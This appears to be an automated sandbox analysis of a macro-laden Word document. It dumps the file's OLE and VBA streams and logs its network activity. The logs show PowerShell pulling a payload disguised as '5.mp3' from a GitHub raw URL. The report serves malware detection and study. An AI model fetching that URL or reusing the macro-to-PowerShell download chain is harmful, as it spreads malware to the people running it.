                                                                                                  Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                  Stream Path: Data, File Type: SysEx File - Garfield, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:Data
                                                                                                  File Type:SysEx File - Garfield
                                                                                                  Stream Size:4096
                                                                                                  Entropy:7.54547746336
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . q 4 : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . C . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . b . . . \\ . . . . . . l . ^ . * c P . G . . . . . . . . 8 . . . . . . . D . . . . . . . . n . . 0 . . . . l . ^ . * c P . G . . . . . . . . P N G . . . . . . . . I H D R . . . . . . . & . . . . . . . . z . . . . I D A T x . . . . .
                                                                                                  Data Raw:f0 0e 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 71 34 3a 02 b8 02 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 40 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 1c 00 00 00 04 41 01 00 00 00 05 c1 04 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 31 00 00 00
                                                                                                  Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410
                                                                                                  General
                                                                                                  Stream Path:Macros/PROJECT
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Stream Size:410
                                                                                                  Entropy:5.39100661112
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:I D = " { 1 4 7 7 3 D 1 2 - 3 6 E D - 4 9 7 4 - A 2 7 E - 6 C 6 3 B 7 A 5 4 1 1 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 0 4 2 E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 C 9 E 3 5 1 B C D 7 6 C E 7 6 C E 7 6 " . . G C = " F 8 F A 5 1 A 2 5 2 A 2 5 2 5 D " . . . . [ H o s t E x
                                                                                                  Data Raw:49 44 3d 22 7b 31 34 37 37 33 44 31 32 2d 33 36 45 44 2d 34 39 37 34 2d 41 32 37 45 2d 36 43 36 33 42 37 41 35 34 31 31 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
                                                                                                  Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
                                                                                                  General
                                                                                                  Stream Path:Macros/PROJECTwm
                                                                                                  File Type:data
                                                                                                  Stream Size:71
                                                                                                  Entropy:3.34859995248
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                                                                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2597
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                  File Type:data
                                                                                                  Stream Size:2597
                                                                                                  Entropy:4.06864016648
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                  Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                  Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2013
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_0
                                                                                                  File Type:data
                                                                                                  Stream Size:2013
                                                                                                  Entropy:3.60393793372
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ L . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 186
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_1
                                                                                                  File Type:data
                                                                                                  Stream Size:186
                                                                                                  Entropy:1.60078147632
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00 00 00 00 00 05 00 06 00
                                                                                                  Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 348
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_2
                                                                                                  File Type:data
                                                                                                  Stream Size:348
                                                                                                  Entropy:1.78667786328
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                  Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 106
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_3
                                                                                                  File Type:data
                                                                                                  Stream Size:106
                                                                                                  Entropy:1.35911194617
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 347
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_4
                                                                                                  File Type:data
                                                                                                  Stream Size:347
                                                                                                  Entropy:2.16838987833
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . g . . . . . g . 2 . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . . . . { . . . . . . . . . . . 8 . @ . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 01 00 01 00 02 00 00 00 21 0b 00 00 00 00 00 00 00 00 00 00 f1 08 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 156
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_5
                                                                                                  File Type:data
                                                                                                  Stream Size:156
                                                                                                  Entropy:1.58115335118
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 568
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/dir
                                                                                                  File Type:data
                                                                                                  Stream Size:568
                                                                                                  Entropy:6.29850563159
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. 4 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . z c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                                                                                                  Data Raw:01 34 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 81 d1 7a 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                                  Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:WordDocument
                                                                                                  File Type:data
                                                                                                  Stream Size:4096
                                                                                                  Entropy:1.46842568754
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j z y z y . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 b . . 6 b G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:ec a5 c1 00 5f 00 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8e 08 00 00 0e 00 62 6a 62 6a 7a 79 7a 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 0e 00 00 18 13 36 62 18 13 36 62 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  11/04/21-02:10:34.051455UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521678.8.8.8192.168.2.22
                                                                                                  11/04/21-02:10:34.130259UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 4, 2021 02:10:34.063070059 CET4916780192.168.2.22140.82.121.4
                                                                                                  Nov 4, 2021 02:10:34.081017971 CET8049167140.82.121.4192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.081187010 CET4916780192.168.2.22140.82.121.4
                                                                                                  Nov 4, 2021 02:10:34.083396912 CET4916780192.168.2.22140.82.121.4
                                                                                                  Nov 4, 2021 02:10:34.100747108 CET8049167140.82.121.4192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.130961895 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.131009102 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.131072998 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.143836975 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.143870115 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.189742088 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.189830065 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.203891039 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.203916073 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.204235077 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.305481911 CET4916780192.168.2.22140.82.121.4
                                                                                                  Nov 4, 2021 02:10:34.399089098 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.504657030 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.544878960 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.645627975 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.645741940 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.645806074 CET44349168140.82.121.3192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.645808935 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.645854950 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.649609089 CET49168443192.168.2.22140.82.121.3
                                                                                                  Nov 4, 2021 02:10:34.677000999 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:34.677047968 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.677129030 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:34.677684069 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:34.677695990 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.725320101 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.725465059 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:34.737406015 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:34.737427950 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.737721920 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.753221035 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:34.800863981 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:35.077357054 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:35.077450037 CET44349169185.199.108.133192.168.2.22
                                                                                                  Nov 4, 2021 02:10:35.077519894 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:35.078119993 CET49169443192.168.2.22185.199.108.133
                                                                                                  Nov 4, 2021 02:10:36.847913027 CET4916780192.168.2.22140.82.121.4

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Nov 4, 2021 02:10:34.029695988 CET5216753192.168.2.228.8.8.8
                                                                                                  Nov 4, 2021 02:10:34.051455021 CET53521678.8.8.8192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.108933926 CET5059153192.168.2.228.8.8.8
                                                                                                  Nov 4, 2021 02:10:34.130259037 CET53505918.8.8.8192.168.2.22
                                                                                                  Nov 4, 2021 02:10:34.657147884 CET5780553192.168.2.228.8.8.8
                                                                                                  Nov 4, 2021 02:10:34.676018953 CET53578058.8.8.8192.168.2.22

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Nov 4, 2021 02:10:34.029695988 CET192.168.2.228.8.8.80x68c2Standard query (0)github.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 02:10:34.108933926 CET192.168.2.228.8.8.80x90beStandard query (0)github.comA (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 02:10:34.657147884 CET192.168.2.228.8.8.80x9bfaStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Nov 4, 2021 02:10:34.051455021 CET8.8.8.8192.168.2.220x68c2No error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 02:10:34.130259037 CET8.8.8.8192.168.2.220x90beNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 02:10:34.676018953 CET8.8.8.8192.168.2.220x9bfaNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 02:10:34.676018953 CET8.8.8.8192.168.2.220x9bfaNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 02:10:34.676018953 CET8.8.8.8192.168.2.220x9bfaNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                  Nov 4, 2021 02:10:34.676018953 CET8.8.8.8192.168.2.220x9bfaNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • github.com
                                                                                                  • raw.githubusercontent.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.2249168140.82.121.3443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.2249169185.199.108.133443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.2249167140.82.121.480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Nov 4, 2021 02:10:34.083396912 CET0OUTGET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
                                                                                                  Host: github.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Nov 4, 2021 02:10:34.100747108 CET0INHTTP/1.1 301 Moved Permanently
                                                                                                  Content-Length: 0
                                                                                                  Location: https://github.com/ssbb36/stv/raw/main/5.mp3


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.2249168140.82.121.3443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 01:10:34 UTC0OUTGET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
                                                                                                  Host: github.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2021-11-04 01:10:34 UTC0INHTTP/1.1 302 Found
                                                                                                  Server: GitHub.com
                                                                                                  Date: Thu, 04 Nov 2021 01:10:34 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Vary: X-PJAX, X-PJAX-Container, Accept-Encoding, Accept, X-Requested-With
                                                                                                  permissions-policy: interest-cohort=()
                                                                                                  Access-Control-Allow-Origin: https://render.githubusercontent.com https://viewscreen.githubusercontent.com https://notebooks.githubusercontent.com
                                                                                                  Location: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
                                                                                                  Cache-Control: no-cache
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                  X-Frame-Options: deny
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 0
                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                  Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                  2021-11-04 01:10:34 UTC0INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                  2021-11-04 01:10:34 UTC2INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 6d 61 69 6e 2f 35 2e 6d 70 33 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <html><body>You are being <a href="https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3">redirected</a>.</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.2249169185.199.108.133443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 01:10:34 UTC2OUTGET /ssbb36/stv/main/5.mp3 HTTP/1.1
                                                                                                  Host: raw.githubusercontent.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2021-11-04 01:10:35 UTC2INHTTP/1.1 200 OK
                                                                                                  Connection: close
                                                                                                  Content-Length: 473
                                                                                                  Cache-Control: max-age=300
                                                                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  ETag: "c42cd382e5da9f4f09cf49119db08f21ab927655a40c4bf6043e9fbeafdbfa36"
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Frame-Options: deny
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  X-GitHub-Request-Id: 575C:24AC:9E4121:A4F6C2:61832E2E
                                                                                                  Accept-Ranges: bytes
                                                                                                  Date: Thu, 04 Nov 2021 01:10:35 GMT
                                                                                                  Via: 1.1 varnish
                                                                                                  X-Served-By: cache-mxp6955-MXP
                                                                                                  X-Cache: MISS
                                                                                                  X-Cache-Hits: 0
                                                                                                  X-Timer: S1635988235.761606,VS0,VE308
                                                                                                  Vary: Authorization,Accept-Encoding,Origin
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  X-Fastly-Request-ID: 6e4358e2e8bb980fac3dd61ca3e53413a0db6210
                                                                                                  Expires: Thu, 04 Nov 2021 01:15:35 GMT
